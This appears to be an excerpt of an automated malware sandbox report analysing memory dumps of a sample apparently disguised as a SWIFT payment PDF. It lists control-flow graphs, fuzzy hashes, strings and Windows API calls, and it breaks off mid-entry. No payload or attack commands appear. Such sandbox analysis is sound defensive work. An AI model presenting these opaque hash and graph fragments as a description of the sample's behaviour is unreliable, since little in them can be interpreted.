                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 183dd69042533a1ea420d6ce8779b7f265e7eda68c9bbb1a6c4d145e81d3e469
                                                                                                                                • Instruction ID: ead33c80994b70f6ad428e703767c87295dcf8c1e4c40ef37d62fa930241299f
                                                                                                                                • Opcode Fuzzy Hash: 183dd69042533a1ea420d6ce8779b7f265e7eda68c9bbb1a6c4d145e81d3e469
                                                                                                                                • Instruction Fuzzy Hash: 9B71D2B5E01228CFDB25DF66C9847DDBBB2BF89301F1091AAD409A7350DB349A82CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9cbf911e8f6a2cb5bbd91cdb7c39360d1893e8addf36f6866361346e33da838f
                                                                                                                                • Instruction ID: d31d5a271a20db6727462800b385b41efff88ee75b8d4e75c09f825478587d4d
                                                                                                                                • Opcode Fuzzy Hash: 9cbf911e8f6a2cb5bbd91cdb7c39360d1893e8addf36f6866361346e33da838f
                                                                                                                                • Instruction Fuzzy Hash: 17611674A40258CFDB25DF64C945BADBB76EB88300F1089AAD90A77364CB359D92DF00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 539c1c274224c11d79276ec7da2c3997e4d8b3cd2c48adb372a5e3a75d2f9f50
                                                                                                                                • Instruction ID: 8d619bc113117da4cf257e057a5a2cd00af909a1d023c69c1d2e8367cd7047e6
                                                                                                                                • Opcode Fuzzy Hash: 539c1c274224c11d79276ec7da2c3997e4d8b3cd2c48adb372a5e3a75d2f9f50
                                                                                                                                • Instruction Fuzzy Hash: 674188B5E016189FEB58CF6BC94479DFAF3AFC8300F14C1AAC54CA6265DB740A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ced0f22674c71d21b8db9d8a35562e4ab47d6af3a6baa39c3079291a23955e20
                                                                                                                                • Instruction ID: 351978ada99150eba09fd518723651cee575ffdc15ccd86296dc65ea0bb7bbdb
                                                                                                                                • Opcode Fuzzy Hash: ced0f22674c71d21b8db9d8a35562e4ab47d6af3a6baa39c3079291a23955e20
                                                                                                                                • Instruction Fuzzy Hash: 934189B1E016188BEB58CF6BC9457C9FAF3AFC9200F04C1AAD54CA6264DB740A868F51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 103 360068e5-360068f9 215 360068fb call 36006c88 103->215 216 360068fb call 36006c98 103->216 104 36006901-36006911 105 36006b06-36006b0a 104->105 106 36006917-3600691a 104->106 109 36006b10-36006b16 105->109 110 36006c2f 105->110 107 36006924-36006927 106->107 108 3600691c-36006922 106->108 107->110 113 3600692d-36006930 107->113 108->107 108->113 111 36006b1c-36006b20 109->111 112 3600682f-36006838 109->112 118 36006c34-36006c64 110->118 114 36006b22-36006b36 111->114 115 36006b39-36006b47 111->115 119 36006847-36006853 112->119 120 3600683a-3600683f 112->120 116 36006932-36006936 113->116 117 36006938-3600693b 113->117 128 36006bb8-36006bcd 115->128 129 36006b49-36006b5e 115->129 116->117 122 36006941-36006945 116->122 117->110 117->122 136 36006c66-36006c7c 118->136 137 36006c7d-36006c84 118->137 119->118 121 36006859-3600685f 119->121 120->119 121->105 124 36006865-36006875 121->124 122->110 126 3600694b-36006951 122->126 138 36006877-36006887 124->138 139 36006889-3600688b 124->139 130 360068b2-360068c3 126->130 131 36006957-36006982 call 36006500 * 2 126->131 146 36006bd4-36006be1 128->146 147 36006bcf-36006bd2 128->147 148 36006b60-36006b63 129->148 149 36006b65-36006b72 129->149 130->118 135 360068c9-360068db 130->135 162 36006988-3600698c 131->162 163 36006a6c-36006a86 131->163 135->118 143 360068e1 135->143 145 3600688e-36006894 138->145 139->145 143->103 145->105 152 3600689a-360068a9 145->152 153 36006be3-36006c1e 146->153 147->153 154 36006b74-36006bb5 148->154 149->154 152->131 156 360068af 152->156 182 36006c25-36006c2c 153->182 156->130 162->105 166 36006992-36006996 162->166 163->111 181 36006a8c-36006a90 163->181 168 36006998-360069a5 166->168 169 360069be-360069c4 166->169 185 360069b4 168->185 186 360069a7-360069b2 168->186 172 360069c6-360069ca 169->172 173 360069ff-36006a05 169->173 172->173 178 360069cc-360069d5 172->178 175 36006a11-36006a17 173->175 176 36006a07-36006a0b 173->176 183 36006a23-36006a25 175->183 184 36006a19-36006a1d 175->184 176->175 176->182 187 360069e4-360069fa 178->187 188 360069d7-360069dc 178->188 189 36006a92-36006a9c call 360053a8 181->189 190 36006acc-36006ad0 181->190 191 36006a27-36006a30 183->191 192 36006a5a-36006a5c 183->192 184->105 184->183 193 360069b6-360069b8 185->193 186->193 187->105 188->187 189->190 203 36006a9e-36006ab3 189->203 190->182 196 36006ad6-36006ada 190->196 199 36006a32-36006a37 191->199 200 36006a3f-36006a55 191->200 192->105 194 36006a62-36006a69 192->194 193->105 193->169 196->182 201 36006ae0-36006aed 196->201 199->200 200->105 206 36006afc 201->206 207 36006aef-36006afa 201->207 203->190 212 36006ab5-36006aca 203->212 209 36006afe-36006b00 206->209 207->209 209->105 209->182 212->111 212->190 215->104 216->104
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                • API String ID: 0-2525668591
                                                                                                                                • Opcode ID: 97806d3a357a4d410f99b97ae029b94ec9e9a607ab548182ac5866ce5da71dc5
                                                                                                                                • Instruction ID: 15a1fe9aba867e1373e67767e6fefcbbd6ae49d64ede477119066ee8301a246b
                                                                                                                                • Opcode Fuzzy Hash: 97806d3a357a4d410f99b97ae029b94ec9e9a607ab548182ac5866ce5da71dc5
                                                                                                                                • Instruction Fuzzy Hash: D4E17974A102198FEB14CF69C991A9EBFF2FF49310F6085A9E4099B261DB31ED91CF50

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 333 394e0978-394e0a0f GetCurrentProcess 337 394e0a18-394e0a4c GetCurrentThread 333->337 338 394e0a11-394e0a17 333->338 339 394e0a4e-394e0a54 337->339 340 394e0a55-394e0a89 GetCurrentProcess 337->340 338->337 339->340 342 394e0a8b-394e0a91 340->342 343 394e0a92-394e0aaa 340->343 342->343 354 394e0aad call 394e0f39 343->354 355 394e0aad call 394e0b57 343->355 345 394e0ab3-394e0ae2 GetCurrentThreadId 347 394e0aeb-394e0b4d 345->347 348 394e0ae4-394e0aea 345->348 348->347 354->345 355->345
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394E09FE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 394E0A3B
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394E0A78
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 394E0AD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: fb547a2c22380ab44f71074605a78db2151542f71f60096e41a42cd2201b8654
                                                                                                                                • Instruction ID: ca5b2aad9f573bb84a6f8c277c35f717842e314504c4ce5dbfab0dc5f5f96906
                                                                                                                                • Opcode Fuzzy Hash: fb547a2c22380ab44f71074605a78db2151542f71f60096e41a42cd2201b8654
                                                                                                                                • Instruction Fuzzy Hash: C25144B0D012498FDB14CFAAC548BEEBFF1AF49304F20855AD419A7360D774A981CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 356 394e0980-394e0a0f GetCurrentProcess 360 394e0a18-394e0a4c GetCurrentThread 356->360 361 394e0a11-394e0a17 356->361 362 394e0a4e-394e0a54 360->362 363 394e0a55-394e0a89 GetCurrentProcess 360->363 361->360 362->363 365 394e0a8b-394e0a91 363->365 366 394e0a92-394e0aaa 363->366 365->366 377 394e0aad call 394e0f39 366->377 378 394e0aad call 394e0b57 366->378 368 394e0ab3-394e0ae2 GetCurrentThreadId 370 394e0aeb-394e0b4d 368->370 371 394e0ae4-394e0aea 368->371 371->370 377->368 378->368
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394E09FE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 394E0A3B
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394E0A78
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 394E0AD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 8e6cc2ab8b6742ff552ede5ae9855826572e631565eb0c145459ec3ed87c8ff3
                                                                                                                                • Instruction ID: bc65dff068de4228b6030b363af0d5421378b16ef53e895afe1e7b97d4d1fc0e
                                                                                                                                • Opcode Fuzzy Hash: 8e6cc2ab8b6742ff552ede5ae9855826572e631565eb0c145459ec3ed87c8ff3
                                                                                                                                • Instruction Fuzzy Hash: D55133B0D012498FDB14DFAAC548BEEBBF1AF49314F20855AD429A7360DB74A980CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 733 38fb7920-38fb7941 734 38fb7948-38fb797e 733->734 735 38fb7943 733->735 738 38fb7987-38fb79ae 734->738 735->734 740 38fb7b3d-38fb7b46 738->740 741 38fb79b4-38fb79cc 738->741 744 38fb7ae8-38fb7b03 741->744 746 38fb7b09-38fb7b2d 744->746 747 38fb79d1-38fb7ae7 744->747 746->740 747->744
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <CC8$<CC8$<CC8
                                                                                                                                • API String ID: 0-1054242872
                                                                                                                                • Opcode ID: 7f7587a15aa69a7670506f5fe009a7f6cadf47b47e0aa13b186b41760d10cbcc
                                                                                                                                • Instruction ID: 017a9afa2890dec82edb54ca24f4e099a4d36cbf123ed3f484818813e1a5eaf8
                                                                                                                                • Opcode Fuzzy Hash: 7f7587a15aa69a7670506f5fe009a7f6cadf47b47e0aa13b186b41760d10cbcc
                                                                                                                                • Instruction Fuzzy Hash: A051F074E01318DFDB15DFA5D944AADBBB2BF88304F208529D809BB364DB759A86CF40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 765 394e01c8-394e0232 CreateWindowExW 767 394e023b-394e0273 765->767 768 394e0234-394e023a 765->768 772 394e0275-394e0278 767->772 773 394e0280 767->773 768->767 772->773 774 394e0281 773->774 774->774
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 394E0222
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 716092398-4108050209
                                                                                                                                • Opcode ID: c63cd3d3016779c75a42dc26c38cd02be0f5dfe3fb348bc2615c52eb6296ec0c
                                                                                                                                • Instruction ID: bbcab64f1db5939f691ddb04583a81235518079e9a64ff763f2ab20eb6355701
                                                                                                                                • Opcode Fuzzy Hash: c63cd3d3016779c75a42dc26c38cd02be0f5dfe3fb348bc2615c52eb6296ec0c
                                                                                                                                • Instruction Fuzzy Hash: 6721E2B5C04208EFDF01DFD4D984ADEBBB5BF08308F208509E918AB260C775A845CF61

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 775 394e2018-394e208a SetTimer 776 394e208c-394e2092 775->776 777 394e2093-394e20a7 775->777 776->777
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Timer
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 2870079774-3372436214
                                                                                                                                • Opcode ID: 5a9ba5f33d5f03502a926177bbec684c0edce1c9f3e7e4fabfdd162ba69fee01
                                                                                                                                • Instruction ID: d81084c7b9b27499392f66c4c5890321ce0713cf7597bf65219fed116349d91e
                                                                                                                                • Opcode Fuzzy Hash: 5a9ba5f33d5f03502a926177bbec684c0edce1c9f3e7e4fabfdd162ba69fee01
                                                                                                                                • Instruction Fuzzy Hash: D81133B5800348DFDB10DF99C889BDEBFF4EB48320F20845AD959A7610C375A980CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 859 36007458-36007946 934 36007e98-36007ecd 859->934 935 3600794c-3600795c 859->935 940 36007ed9-36007ef7 934->940 941 36007ecf-36007ed4 934->941 935->934 936 36007962-36007972 935->936 936->934 937 36007978-36007988 936->937 937->934 939 3600798e-3600799e 937->939 939->934 942 360079a4-360079b4 939->942 953 36007ef9-36007f03 940->953 954 36007f6e-36007f7a 940->954 943 36007fbe-36007fc3 941->943 942->934 944 360079ba-360079ca 942->944 944->934 946 360079d0-360079e0 944->946 946->934 947 360079e6-360079f6 946->947 947->934 949 360079fc-36007a0c 947->949 949->934 950 36007a12-36007a22 949->950 950->934 952 36007a28-36007e97 950->952 953->954 958 36007f05-36007f11 953->958 959 36007f91-36007f9d 954->959 960 36007f7c-36007f88 954->960 965 36007f13-36007f1e 958->965 966 36007f36-36007f39 958->966 968 36007fb4-36007fb6 959->968 969 36007f9f-36007fab 959->969 960->959 967 36007f8a-36007f8f 960->967 965->966 980 36007f20-36007f2a 965->980 971 36007f50-36007f5c 966->971 972 36007f3b-36007f47 966->972 967->943 968->943 969->968 978 36007fad-36007fb2 969->978 975 36007fc4-36007fde 971->975 976 36007f5e-36007f65 971->976 972->971 982 36007f49-36007f4e 972->982 976->975 979 36007f67-36007f6c 976->979 978->943 979->943 980->966 987 36007f2c-36007f31 980->987 982->943 987->943
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q
                                                                                                                                • API String ID: 0-355816377
                                                                                                                                • Opcode ID: 633dbdd4edb5c8da1ace158f2f4cdf227944c74f1fb9c444f7247836671597f4
                                                                                                                                • Instruction ID: b910aea643450761e74360416d9c2148d2c75aa2b9a5bcf5163c2f7ac05964e6
                                                                                                                                • Opcode Fuzzy Hash: 633dbdd4edb5c8da1ace158f2f4cdf227944c74f1fb9c444f7247836671597f4
                                                                                                                                • Instruction Fuzzy Hash: DA524274A10218CFEB54DBA4C895B9EBFB7AF48300F1091AAC10A6B3A4DF359D85DF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1046 360054a8-360054a9 1047 36005695-360056cd 1046->1047 1048 360054aa-360054be 1046->1048 1061 360056d6-360056da 1047->1061 1062 360056cf-360056d4 1047->1062 1051 360054c0-360054c3 1048->1051 1052 360054d3-360054d6 1048->1052 1053 360054e2-360054e8 1051->1053 1054 360054c5-360054c8 1051->1054 1052->1053 1055 360054d8-360054db 1052->1055 1063 36005500-36005515 1053->1063 1064 360054ea-360054f0 1053->1064 1057 360055c9-360055cf 1054->1057 1058 360054ce 1054->1058 1059 360054dd 1055->1059 1060 3600552e-36005534 1055->1060 1065 360055d1-360055d7 1057->1065 1066 360055e7-360055f1 1057->1066 1067 360055f4-36005601 1058->1067 1059->1067 1068 36005536-3600553c 1060->1068 1069 3600554c-3600555e 1060->1069 1070 360056e0-360056e2 1061->1070 1062->1070 1087 3600551a-3600551d 1063->1087 1071 360054f2 1064->1071 1072 360054f4-360054fe 1064->1072 1075 360055d9 1065->1075 1076 360055db-360055e5 1065->1076 1066->1067 1090 36005603-36005607 1067->1090 1091 36005615-36005617 1067->1091 1078 36005540-3600554a 1068->1078 1079 3600553e 1068->1079 1084 36005560-3600556c 1069->1084 1085 3600556e-36005591 1069->1085 1073 360056e4-360056f6 1070->1073 1074 360056f7-360056fe 1070->1074 1071->1063 1072->1063 1075->1066 1076->1066 1078->1069 1079->1069 1102 360055b9-360055c7 1084->1102 1094 36005690 1085->1094 1110 36005597-3600559a 1085->1110 1099 36005526-36005529 1087->1099 1090->1091 1092 36005609-3600560d 1090->1092 1093 3600561b-3600561e 1091->1093 1092->1094 1095 36005613 1092->1095 1093->1094 1096 36005620-36005623 1093->1096 1094->1047 1095->1093 1100 36005629-3600562f 1096->1100 1101 3600549a-360054a6 1096->1101 1099->1067 1103 36005631-36005633 1100->1103 1104 36005635-36005639 1100->1104 1101->1046 1102->1067 1107 36005688-3600568f 1103->1107 1108 36005686 1104->1108 1109 3600563b-36005641 1104->1109 1108->1107 1109->1094 1111 36005643-36005646 1109->1111 1110->1094 1112 360055a0-360055b2 1110->1112 1111->1094 1113 36005648-3600565d 1111->1113 1112->1102 1116 36005681-36005684 1113->1116 1117 3600565f-36005665 1113->1117 1116->1107 1118 36005677-3600567a 1117->1118 1119 36005667-36005675 1117->1119 1118->1094 1120 3600567c-3600567f 1118->1120 1119->1094 1119->1118 1120->1116 1120->1117
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,bq$,bq
                                                                                                                                • API String ID: 0-2699258169
                                                                                                                                • Opcode ID: 727f5b2a159b226af8ac77bd10502da298d3bdd8587cb45fba1aec07efe25d3d
                                                                                                                                • Instruction ID: 63d6527eae4f89bd7eae4073f526ede671913b3b18f54eab31c1da738452f3de
                                                                                                                                • Opcode Fuzzy Hash: 727f5b2a159b226af8ac77bd10502da298d3bdd8587cb45fba1aec07efe25d3d
                                                                                                                                • Instruction Fuzzy Hash: A18190B8B00215CFEB05CFA9C69599EBBF2BF48215B6580A9D405DB361DB31E841CF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1122 38fbfab0-38fbfafe 1127 38fbfb00-38fbfb13 1122->1127 1128 38fbfb15-38fbfb1d 1122->1128 1127->1128 1132 38fbfb24-38fbfb56 call 38fbebfc 1127->1132 1128->1132 1174 38fbfb58 call 3841f4c8 1132->1174 1175 38fbfb58 call 3841f4e8 1132->1175 1138 38fbfb5e-38fbfb88 1141 38fbfb8a-38fbfb9d 1138->1141 1142 38fbfba2-38fbfbdb call 38fbec0c 1138->1142 1143 38fbfdd9-38fbfddf 1141->1143 1152 38fbfbdd-38fbfbec 1142->1152 1153 38fbfc10-38fbfcd9 1142->1153 1144 38fbfde9 1143->1144 1145 38fbfde1 1143->1145 1148 38fbfdea 1144->1148 1145->1144 1148->1148 1152->1153 1156 38fbfbee-38fbfc08 1152->1156 1176 38fbfcdc call 394e00b7 1153->1176 1177 38fbfcdc call 394e00c0 1153->1177 1156->1153 1169 38fbfce2-38fbfd3c 1172 38fbfd3e 1169->1172 1173 38fbfd47 1169->1173 1172->1173 1173->1143 1174->1138 1175->1138 1176->1169 1177->1169
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PO?6$gC8
                                                                                                                                • API String ID: 0-3506676155
                                                                                                                                • Opcode ID: f48725bce2c4156d26ece4e34122c1b3bc79fe2e8cf770c84368a15d67e8842b
                                                                                                                                • Instruction ID: cd320a03908a0c543e61ee0d40cd1d24e634ee7196bc7a97971f54c9ee26ac05
                                                                                                                                • Opcode Fuzzy Hash: f48725bce2c4156d26ece4e34122c1b3bc79fe2e8cf770c84368a15d67e8842b
                                                                                                                                • Instruction Fuzzy Hash: A1711675A00619CFDF19DFB5C8589ADBBB2FF88300F20856AE406AB290DB749952CF41
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                • API String ID: 0-4258043069
                                                                                                                                • Opcode ID: c754bf570a25de697e4c2d71cc0a07b765dad03bbb32073a174dae3e67ba9ba8
                                                                                                                                • Instruction ID: c460db1733046b170001ab62978304898d46f98693ebfeab7996ee56636bbfed
                                                                                                                                • Opcode Fuzzy Hash: c754bf570a25de697e4c2d71cc0a07b765dad03bbb32073a174dae3e67ba9ba8
                                                                                                                                • Instruction Fuzzy Hash: 9551DF79704254CFEB068F65C846B6E3FF6FF88349F2445A9E9059B290CB75C802CBA5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                • Opcode ID: a4a3cd41ccddc63bf1aed87ce4f3118d436119f107e98428b7898a56ec793ff5
                                                                                                                                • Instruction ID: 84e4bd5b3e2c269e341ba4759a7c2e75c1a0d384209592256807471a2e6a842f
                                                                                                                                • Opcode Fuzzy Hash: a4a3cd41ccddc63bf1aed87ce4f3118d436119f107e98428b7898a56ec793ff5
                                                                                                                                • Instruction Fuzzy Hash: B5519134B002149FFB04CF69C885B6A7BEBFF88354F1489A5EA09CB252DB71CD418B91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PO?6$gC8
                                                                                                                                • API String ID: 0-3506676155
                                                                                                                                • Opcode ID: 31d89bbcf6f581dd4f01a2580b2efd30c8cfe86a91938ff72ef1dc5b7f9dcac2
                                                                                                                                • Instruction ID: ba3ba3184c1ee3211a0565cdbda7764b0ba4e26d81816b7e689fc205513f9970
                                                                                                                                • Opcode Fuzzy Hash: 31d89bbcf6f581dd4f01a2580b2efd30c8cfe86a91938ff72ef1dc5b7f9dcac2
                                                                                                                                • Instruction Fuzzy Hash: 66316D78E006098FDF19DFB6C4586ADBBF2AF88204F24892EC446AB350DF348942CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <CC8$<CC8
                                                                                                                                • API String ID: 0-467816798
                                                                                                                                • Opcode ID: 785986f851a6bdaff32bf1c6a5fa08bef86ae4304cc504fc930f21d16fafcd00
                                                                                                                                • Instruction ID: 4a1bceb89cb1e4fac32a7a8b2eb61d8f33eac2364601930109952b669ba861cc
                                                                                                                                • Opcode Fuzzy Hash: 785986f851a6bdaff32bf1c6a5fa08bef86ae4304cc504fc930f21d16fafcd00
                                                                                                                                • Instruction Fuzzy Hash: 343102B4D023589FEB05CFA1D444AEEBBB2AF49304F10886AD459BB240DB78468ACF41
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 394E1E81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: 7e7226188ed982e5a9ac097c2490d7efc89bf9594651944e7a52e0872e87cac3
                                                                                                                                • Instruction ID: 85b2a0c6935df93356c28f90f36b8b1fae6c8f9e797ac6c5e7c1d821ac038c68
                                                                                                                                • Opcode Fuzzy Hash: 7e7226188ed982e5a9ac097c2490d7efc89bf9594651944e7a52e0872e87cac3
                                                                                                                                • Instruction Fuzzy Hash: 2E4103B8A00349CFDB14CF99C448A9AFBF5FF89315F24C499E519AB321D735A841CBA0
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 394E0C4F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: a04b740ab7835252daee6019fe282de807bae0a7aa7668bd1be8bf27e766a62e
                                                                                                                                • Instruction ID: e92630ea5e7e09736becd98e8960da23e09857838b121798756a5775b5ab1d3c
